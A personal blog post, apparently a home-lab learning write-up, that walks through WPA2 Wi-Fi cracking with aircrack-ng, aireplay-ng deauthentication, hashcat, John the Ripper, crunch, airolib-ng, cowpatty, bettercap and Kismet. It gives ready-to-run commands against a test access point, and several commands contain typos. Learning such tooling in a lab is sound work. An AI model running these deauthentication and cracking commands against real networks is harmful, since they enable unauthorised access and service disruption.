Time to do some wireless hacking. If you read my other posts you know that I am on a mission get OSCP. But sometimes you need to do something else. This is my attempt to do something else 🙂
Todo what I do in this post you need some hardware. At least a network card that supports monitor mode. In my case I use TP-LINK USB TL-WN722N version 1. You laso need an acces point that you can dive into. In the screenshot I am almost always root, you can do sudo if you want.
Where to find card that support monitor mode.
Look up vendors when you have mac adress. For examples to lookup default passwords.
This toolset consist of different commands where are gonna go thru.
and we also gonna look at
John The Ripper
Monitor Mode with airmon-ng
When we are cracking wirelss we need to set the network card in monitor mode.
To get the help you need
List the supported cards
Do a check on what processes need to be shutdown for the card to enter monitor mode
airmon-nv check kill
Do the shutdown
Set the card in monitor mode.
airmon-ng stop wlan0mon
How to stop the monitor mode
Start airmon-ng with a specific channel (2), we use this if the other tools that we are gonna use does not support handeling channels.
To see what channel and freqvens we are listnening on we can use below command
iw dev wlan0mon info
Commands and explenation on some words that are nice to know
Use Space = to pause the output on the screen. (The sniffing will continue)
TAB + up and down arrow = Scrool between access points
m = Color on the screen
a = Display options
s = Sort on diffrent colums
i = Invert sorting
d = Default sorting
BSSID = Mac adress of the access point
PWR = Signal level
RXQ = Receive Quality in % of frames successfully recived in 10 seconds
Beacons = Beacons sent by the access point
#Data = Number of caputerd data packets. Includning data broadcast packets
#/s = Number of data packets the last 10 seconfs
CH = Channel number
MB = Maximum speed
ENC = Encryption alagorithm that is in use OPN means no encryption
CIPHER = Security protocol
AUTH = Authentication protocol
ESSID = Wireless network name. I it is hidden, it is displayed in numer, for ex. 7 that means that the ssid has 7 charachters. It can also be 0, that means that the access point is hiding the number of characters in a hidden name.
Rate = Last used rate between the client and the Access point 24e – 1E. 24E means from the access point to the client and 1E from the client to the access point. This is only shown when we at a fixed channel, it wont show when channel hopping.
Lost = Lost frames from the client side.
Frames = Data frames sent from the client
Probes = SSID probed by the client
To sniff wireless network we use airdump-ng. To write to file we also add –write to the command.
airodump-ng wlan0mon --write /tmp/capture.cap
There 2 areas in below picture. The upper we can see what access points we can see. The lower is also the access point in the left colum and the second colum is the the station or clients that are connected to the access poing.
When we are at locations that have many networks it can be hard to see anything. That is why we are using specific network scans.
-c = Channel
–bssid = Access point mac adress
–write = Write the data to log files
–gpsd = We can use gps to see where the access point are located
airodump-ng -c 3 --bssid 10:8C:CF:EB:C9:10 wlan0mon --write /tmp/capture.cap
The goal here is to capture WPA handshake
Can we inject frames into access points?
aireplay-ng -9 wlan0mon
Injection test on specific access point. -e is SSID and -a mac adress on the access point. We can also append -D to diable access point detection. -D does not wait for a beacon fram to start.
aireplay-ng -9 wlan0mon -e PDA-TEST -a 10:8C:CF:EB:C9:10
Card to Card injections test
A more accurate test, this will garantee that we send frames correct. You schoul have two different cards here. I hav only one so that is way the same interface name.
aireplay-ng -9 -i wlan0mon wlan0mon
This is used to crack WPA WPA2 networks with pre-shared key configured. This is an offline attack.
We can test the system how many passphrase per second.
Is used to decrypt WEP WPA/PSK WPA2/PSK.
Remove wireless headers from unencrypted frames
airdecap-ng -b 10:8C:CF:EB:C9:10 /tmp/capture.cap-01.cap
We now have a much smaller file to work with
Python script that uses csv files to create graph.
-i = Input CSV fle
-o = Output file name
-g = Type of graph
Client to access points relations graph
/usr/bin/airgraph-ng -i /tmp/capture.cap-01.csv -o /tmp/out.png -g CAPR
Client probe graph
We now chnage the -g to CPG instead
/usr/bin/airgraph-ng -i /tmp/capture.cap-01.csv -o /tmp/out.png -g CPG
You will need a “big” cpu to do this. The faster the better.
- Capture handshake
- Create password file
When the AUTH type is MGT (Enterprise) this will not work.
If we not get WPA handshake we need to deauthenticate clients from this access point.
-0 1 means that we deauthenticate one time, -a is the access point mac and c is the client
aireplay-ng -0 1 -a 10:8C:CF:EB:C9:10 -c 3E:C2:07:00:43:C2 wlan0mon
And after 3 tries we get a handshake
If 802.11 w Protected Management Frames is in use we can not deauthenticate the clients. Then we need to wait for clients to connect
Now it is time to crack the pre-shared key. -e ssid -b is access points mac.
aircrack-ng -w /home/kracken/Downloads/wordlists/seclist/WiFi-WPA/probable-v2-wpa-top4800.txt -e PDA-TEST -b 10:8C:CF:EB:C9:10 /tmp/1-capture.cap-01.cap
We can verify that the key we found is working, One way is to connect to the network ofcource. Bu we can also do this offline with airdecap-ng.
airdecap-ng -b 10:8C:CF:EB:C9:10 -e PDA-TEST -p test1234 /tmp/1-capture.cap-01.cap
We can use Crunch, RSMangler or John The Ripper to create custom password list!
John The Ripper
We can also edit rules config on John The Ripper. You can edit the file below and modify it your own way.
john --wordlist=/usr/share/john/password.lst --rules --stdout | grep test1234
We can now see that if you use rules with John The Ripper we can find our password:
Then we can use aircrack-ng with John the Ripper
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e PDA-TEST -w - /tmp/1-capture.cap-01
You can create a pssword list with crunch.
If you filter your creation of password list you can use below
@ = lowercase
, = upercase
% = numbers
^ = symbols
crunch 9 9
This will genereate a password list with all combos and will be very larges 49 TB
To benchmark hashcat to see what it can du you can user the benchmark feature of hashcat -b but -b is gonna test all hashes. In this case the mode 2500 is of value to us.
hashcat.bin -b -m 2500
To convert cap files to hccapx files. I did not have this installed so I fetch that from:
./cap2hccapx.bin /tmp/1-capture.cap-01.cap /tmp/hash.hccapx
The we can start hashcat
./hashcat.bin -m 2500 -a 0 /tmp/hash.hccapx /home/kracken/Downloads/wordlists/seclist.txt
Brute force attack with hashcat in this case we know the lengt of the password. T
./hashcat.bin -m 2500 -a 3 -w 3 -i /tmp/hash.hccapx '?h?h?h?h?h?h?h?h' --potfile-disable
As we can see here it gonna take som time! This was never ended. Bruteforce is hard!
This tool for store and manage ssid and passwords list, to calculate Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking.
echo PDA-TEST > essid.txt
airolib-ng wifi.sqlite --import essid essid.txt
To see stats
airolib-ng wifi.sqlite –stats
To import password in the database
airolib-ng wifi.sqlite --import passwd /home/roger/github/SecLists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
Compute the PMK
airolib-ng wifi.sqlite --batch
Then we can use aircrack-ng to crack the password really fast
aircrack-ng -r wifi.sqlite /tmp/1-capture.cap-01.cap
And if we then do a stats on the database?
cowpatty and rainbowtables
This is a tool to identify weak passphrases that were used to generate the PMK.
Generate rainbow tables
genpmk -f /home/roger/github/SecLists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt -d hashes -s PDA-TEST
Then we run cowpatty against the file
/usr/bin/cowpatty -r /tmp/1-capture.cap-01.cap -d /tmp/hashes -s PDA-TEST
BetterCAP is a powerful, flexible and portable tool created to perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in real-time, sniff for credentials, and much more. Suport for main functions as Bluetooth LE, HID och 2.4Ghz, Ethernet and WiFi. And it support autocomplete 🙂
To start bettercap
bettercap -iface wlan0
Modules that are in this version of bettercap
Discover AP. Bettercap for did not put the card in monitormode so before I started bettercap I put the card in monitor mode with airmon start wlan0
bettercap -iface wlan0mon 3
To listen to AP on channel 3
wifi.recon on 3
To clear som events so the screen does not fill up to fast
To turn of completly
To show the accesspoint found
To schedule a command. The interval is 1 second default
set ticker.commands "clear; wifi.show"
set wifi.show.sort client desc
set wifi.show.filter "WPA2"
To reset filter
set wifi.showfilter ""
To deauth all (not best practies 🙂 )
We got the handshake!
Caplets and HTTP
Caplets are configurations files that you can use to start bettercap easy. They are not installed by default you install them with.
apt-get install bettercap-caplets
Thet are located /usr/share/bettercap/caplets
If we for example loog att how to start the http server
How to start bettercap with caplet http-ui
bettercap -iface wlan0mon -caplet http-ui
Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.
Kismet works with Wi-Fi interfaces, Bluetooth interfaces, some SDR (software defined radio) hardware like the RTLSDR, and other specialized capture hardware.
ls -alh /etc/kismet
kismet_80211.conf = Wifi
kismet_alerts.conf = Alerts and Intrution and Detections
kismet.conf = Master file
kismet_filter.conf = Filtering tools
kismet_httpd.conf = Web server
kismet_logging.conf = Logging how and where to put them
kismet_memory.conf = Memory config
kismet_uav.conf = Parsing rules for detecting UAV / Drones
kismet_wardrive.conf = Wardrivning
You can use a site config, then above is ignored
Starting kismet with datasource wifi
kismet -c wlanmon0
Browse to http:/localhost:2501
That was all for today!